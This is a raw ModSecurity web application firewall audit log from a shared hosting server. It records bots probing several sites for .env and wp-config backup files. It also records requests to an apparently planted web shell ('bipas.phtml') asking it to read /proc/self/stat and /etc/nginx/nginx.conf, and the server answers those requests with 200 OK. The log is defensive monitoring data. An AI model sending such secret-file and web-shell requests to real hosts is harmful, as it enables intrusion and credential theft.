--96d7ce0f-F-- HTTP/1.1 404 Not Found link: </_next/static/media/a34f9d1faa5f3315-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Accept-Encoding Content-Encoding: gzip Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --96d7ce0f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "showsadmin.tandonamit.com"] [uri "/.env.production"] [unique_id "aE42TX2MSXWlBRpdvOiMNAAAAAk"] Stopwatch: 1749956173066177 16437 (- - -) Stopwatch2: 1749956173066177 16437; combined=2042, p1=341, p2=1509, p3=53, p4=55, p5=84, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --96d7ce0f-Z-- --16913e3c-A-- [15/Jun/2025:08:26:13.450543 +0530] aE42TcQgjKnP_-nTjoBy7wAAAAM 185.177.72.144 60648 127.0.0.1 7081 --16913e3c-B-- GET /app/.env HTTP/1.0 Host: showsadmin.tandonamit.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --16913e3c-F-- HTTP/1.1 404 Not Found link: </_next/static/media/a34f9d1faa5f3315-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Accept-Encoding Content-Encoding: gzip Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --16913e3c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "showsadmin.tandonamit.com"] [uri "/app/.env"] [unique_id "aE42TcQgjKnP_-nTjoBy7wAAAAM"] Stopwatch: 1749956173434562 16048 (- - -) Stopwatch2: 1749956173434562 16048; combined=2017, p1=381, p2=1420, p3=61, p4=63, p5=92, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --16913e3c-Z-- --b08f2d1e-A-- [15/Jun/2025:08:26:13.483723 +0530] aE42TcH4SeX80EzN5eWfGwAAAAs 185.177.72.144 60656 127.0.0.1 7081 --b08f2d1e-B-- GET /app/.env HTTP/1.0 Host: shows.tandonamit.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b08f2d1e-F-- HTTP/1.1 404 Not Found link: </_next/static/media/be4dbde7f10bc465-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: no-store, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Accept-Encoding Content-Encoding: gzip Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --b08f2d1e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "shows.tandonamit.com"] [uri "/app/.env"] [unique_id "aE42TcH4SeX80EzN5eWfGwAAAAs"] Stopwatch: 1749956173460395 23393 (- - -) Stopwatch2: 1749956173460395 23393; combined=1933, p1=383, p2=1366, p3=50, p4=52, p5=81, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b08f2d1e-Z-- --5c4a8d44-A-- [15/Jun/2025:08:26:14.929056 +0530] aE42TmydX8vZg3SgqNzUqgAAAAI 185.177.72.144 60852 127.0.0.1 7081 --5c4a8d44-B-- GET /laravel/.env HTTP/1.0 Host: showsadmin.tandonamit.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5c4a8d44-F-- HTTP/1.1 404 Not Found link: </_next/static/media/a34f9d1faa5f3315-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Accept-Encoding Content-Encoding: gzip Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --5c4a8d44-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "showsadmin.tandonamit.com"] [uri "/laravel/.env"] [unique_id "aE42TmydX8vZg3SgqNzUqgAAAAI"] Stopwatch: 1749956174912388 16732 (- - -) Stopwatch2: 1749956174912388 16732; combined=2086, p1=443, p2=1488, p3=39, p4=39, p5=77, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5c4a8d44-Z-- --b8cef54f-A-- [15/Jun/2025:08:26:15.096555 +0530] aE42Tz8QAuiw8zL7QHNY9gAAAAU 185.177.72.144 60888 127.0.0.1 7081 --b8cef54f-B-- GET /laravel/.env HTTP/1.0 Host: shows.tandonamit.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b8cef54f-F-- HTTP/1.1 404 Not Found link: </_next/static/media/be4dbde7f10bc465-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: no-store, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Accept-Encoding Content-Encoding: gzip Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --b8cef54f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "shows.tandonamit.com"] [uri "/laravel/.env"] [unique_id "aE42Tz8QAuiw8zL7QHNY9gAAAAU"] Stopwatch: 1749956175070874 25803 (- - -) Stopwatch2: 1749956175070874 25803; combined=2183, p1=423, p2=1488, p3=64, p4=58, p5=149, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b8cef54f-Z-- --3051167a-A-- [15/Jun/2025:08:38:08.244909 +0530] aE45Fj9o8tFLnaQ0S_484gAAAAQ 173.239.224.41 53666 127.0.0.1 7081 --3051167a-B-- GET /.env HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 173.239.224.41 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --3051167a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28832 Connection: close Content-Type: text/html; charset=UTF-8 --3051167a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tandonamit.com"] [uri "/.env"] [unique_id "aE45Fj9o8tFLnaQ0S_484gAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749956886334962 1910018 (- - -) Stopwatch2: 1749956886334962 1910018; combined=2387, p1=465, p2=1828, p3=0, p4=0, p5=94, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3051167a-Z-- --39be997f-A-- [15/Jun/2025:08:38:55.880363 +0530] aE45R8QgjKnP_-nTjoB0EwAAAAM 77.246.98.159 52646 127.0.0.1 7080 --39be997f-B-- GET /wp-config.php.save.3 HTTP/1.0 Host: decklancer.com X-Real-IP: 77.246.98.159 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Accept: */* --39be997f-F-- HTTP/1.1 404 Not Found Content-Length: 260 Connection: close Content-Type: text/html; charset=iso-8859-1 --39be997f-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "decklancer.com"] [uri "/wp-config.php.save.3"] [unique_id "aE45R8QgjKnP_-nTjoB0EwAAAAM"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/default/htdocs/wp-config.php.save.3' not found or unable to stat Stopwatch: 1749956935876985 3436 (- - -) Stopwatch2: 1749956935876985 3436; combined=2109, p1=495, p2=1489, p3=17, p4=28, p5=80, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --39be997f-Z-- --dab4565a-A-- [15/Jun/2025:08:38:56.338048 +0530] aE45SOGp91NCs5RsuUFuEwAAAAE 77.246.98.159 52648 127.0.0.1 7080 --dab4565a-B-- GET /wp-config.php.save.4 HTTP/1.0 Host: decklancer.com X-Real-IP: 77.246.98.159 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Accept: */* --dab4565a-F-- HTTP/1.1 404 Not Found Content-Length: 260 Connection: close Content-Type: text/html; charset=iso-8859-1 --dab4565a-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "decklancer.com"] [uri "/wp-config.php.save.4"] [unique_id "aE45SOGp91NCs5RsuUFuEwAAAAE"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/default/htdocs/wp-config.php.save.4' not found or unable to stat Stopwatch: 1749956936334037 4077 (- - -) Stopwatch2: 1749956936334037 4077; combined=2522, p1=530, p2=1852, p3=29, p4=34, p5=77, sr=147, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dab4565a-Z-- --734de128-A-- [15/Jun/2025:08:38:56.756101 +0530] aE45SLEfOI5jz-ckSxSiLwAAAAg 77.246.98.159 52658 127.0.0.1 7080 --734de128-B-- GET /wp-config.php.save.5 HTTP/1.0 Host: decklancer.com X-Real-IP: 77.246.98.159 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Accept: */* --734de128-F-- HTTP/1.1 404 Not Found Content-Length: 260 Connection: close Content-Type: text/html; charset=iso-8859-1 --734de128-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "decklancer.com"] [uri "/wp-config.php.save.5"] [unique_id "aE45SLEfOI5jz-ckSxSiLwAAAAg"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/default/htdocs/wp-config.php.save.5' not found or unable to stat Stopwatch: 1749956936752851 3293 (- - -) Stopwatch2: 1749956936752851 3293; combined=1992, p1=461, p2=1431, p3=20, p4=25, p5=55, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --734de128-Z-- --81108279-A-- [15/Jun/2025:08:38:57.153996 +0530] aE45SX2MSXWlBRpdvOiNUgAAAAk 77.246.98.159 52670 127.0.0.1 7080 --81108279-B-- GET /wp-config.php.save.6 HTTP/1.0 Host: decklancer.com X-Real-IP: 77.246.98.159 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Accept: */* --81108279-F-- HTTP/1.1 404 Not Found Content-Length: 260 Connection: close Content-Type: text/html; charset=iso-8859-1 --81108279-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "decklancer.com"] [uri "/wp-config.php.save.6"] [unique_id "aE45SX2MSXWlBRpdvOiNUgAAAAk"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/default/htdocs/wp-config.php.save.6' not found or unable to stat Stopwatch: 1749956937150834 3216 (- - -) Stopwatch2: 1749956937150834 3216; combined=1959, p1=404, p2=1456, p3=21, p4=26, p5=52, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --81108279-Z-- --5f698d16-A-- [15/Jun/2025:08:38:57.698149 +0530] aE45SR6N9C2vdY7GQBU7BAAAAAY 77.246.98.159 52674 127.0.0.1 7080 --5f698d16-B-- GET /wp-config.php.save.7 HTTP/1.0 Host: decklancer.com X-Real-IP: 77.246.98.159 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Accept: */* --5f698d16-F-- HTTP/1.1 404 Not Found Content-Length: 260 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f698d16-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "decklancer.com"] [uri "/wp-config.php.save.7"] [unique_id "aE45SR6N9C2vdY7GQBU7BAAAAAY"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/default/htdocs/wp-config.php.save.7' not found or unable to stat Stopwatch: 1749956937694877 3316 (- - -) Stopwatch2: 1749956937694877 3316; combined=2030, p1=410, p2=1505, p3=22, p4=26, p5=66, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5f698d16-Z-- --3f53b710-A-- [15/Jun/2025:08:40:27.753783 +0530] aE45o32MSXWlBRpdvOiNbQAAAAk 54.84.93.8 40332 127.0.0.1 7081 --3f53b710-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self&viewfile=//proc/self/stat HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.84.93.8 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --3f53b710-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3128 Connection: close Content-Type: text/html; charset=UTF-8 --3f53b710-H-- Message: Warning. Matched phrase "proc/self/stat" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/stat found within ARGS:viewfile: /proc/self/stat"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/stat" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/stat found within ARGS:viewfile: /proc/self/stat"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE45o32MSXWlBRpdvOiNbQAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1749957027749527 4309 (- - -) Stopwatch2: 1749957027749527 4309; combined=2281, p1=341, p2=1817, p3=39, p4=26, p5=58, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3f53b710-Z-- --8f526126-A-- [15/Jun/2025:08:40:56.337474 +0530] aE45vz9o8tFLnaQ0S_49FgAAAAQ 52.169.15.141 47140 127.0.0.1 7081 --8f526126-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: www.rooferscombine.com X-Real-IP: 52.169.15.141 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check --8f526126-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Connection: close Content-Type: text/html; charset=UTF-8 --8f526126-H-- Message: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.rooferscombine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.rooferscombine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] [hostname "www.rooferscombine.com"] [uri "/images/stories/admin-post.php"] [unique_id "aE45vz9o8tFLnaQ0S_49FgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rooferscombine.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749957055100711 1236820 (- - -) Stopwatch2: 1749957055100711 1236820; combined=1757, p1=298, p2=1365, p3=0, p4=0, p5=93, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8f526126-Z-- --11595230-A-- [15/Jun/2025:09:00:58.961572 +0530] aE4-ccH4SeX80EzN5eWh1wAAAAs 74.125.216.129 47066 127.0.0.1 7081 --11595230-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 74.125.216.129 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 362 Accept-Language: en-US Content-Type: text/plain;charset=UTF-8 Cookie: _fbp=fb.1.1749958227041.404138779254416445 Origin: https://www.retaxis.com Referer: https://www.retaxis.com/ Accept: */* User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br --11595230-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: _sfs_id=5ede068ab9625d3b0863240d1476342f1749958258; expires=Sun, 15 Jun 2025 04:30:58 GMT; Max-Age=3600; path=/; secure; HttpOnly Set-Cookie: PHPSESSID=4n925ke0floh9nkr8keacmgqqc; expires=Sat, 13 Sep 2025 03:30:58 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --11595230-E-- --11595230-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aE4-ccH4SeX80EzN5eWh1wAAAAs"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aE4-ccH4SeX80EzN5eWh1wAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749958257510584 1451085 (- - -) Stopwatch2: 1749958257510584 1451085; combined=2678, p1=455, p2=1974, p3=100, p4=36, p5=113, sr=88, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --11595230-Z-- --e0ec352b-A-- [15/Jun/2025:09:12:07.591799 +0530] aE5BDz8QAuiw8zL7QHNc0wAAAAU 44.223.193.255 47728 127.0.0.1 7081 --e0ec352b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/nginx&viewfile=//etc/nginx/nginx.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.223.193.255 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --e0ec352b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3404 Connection: close Content-Type: text/html; charset=UTF-8 --e0ec352b-H-- Message: Warning. Matched phrase "etc/nginx/nginx.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/nginx/nginx.conf found within ARGS:viewfile: /etc/nginx/nginx.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: 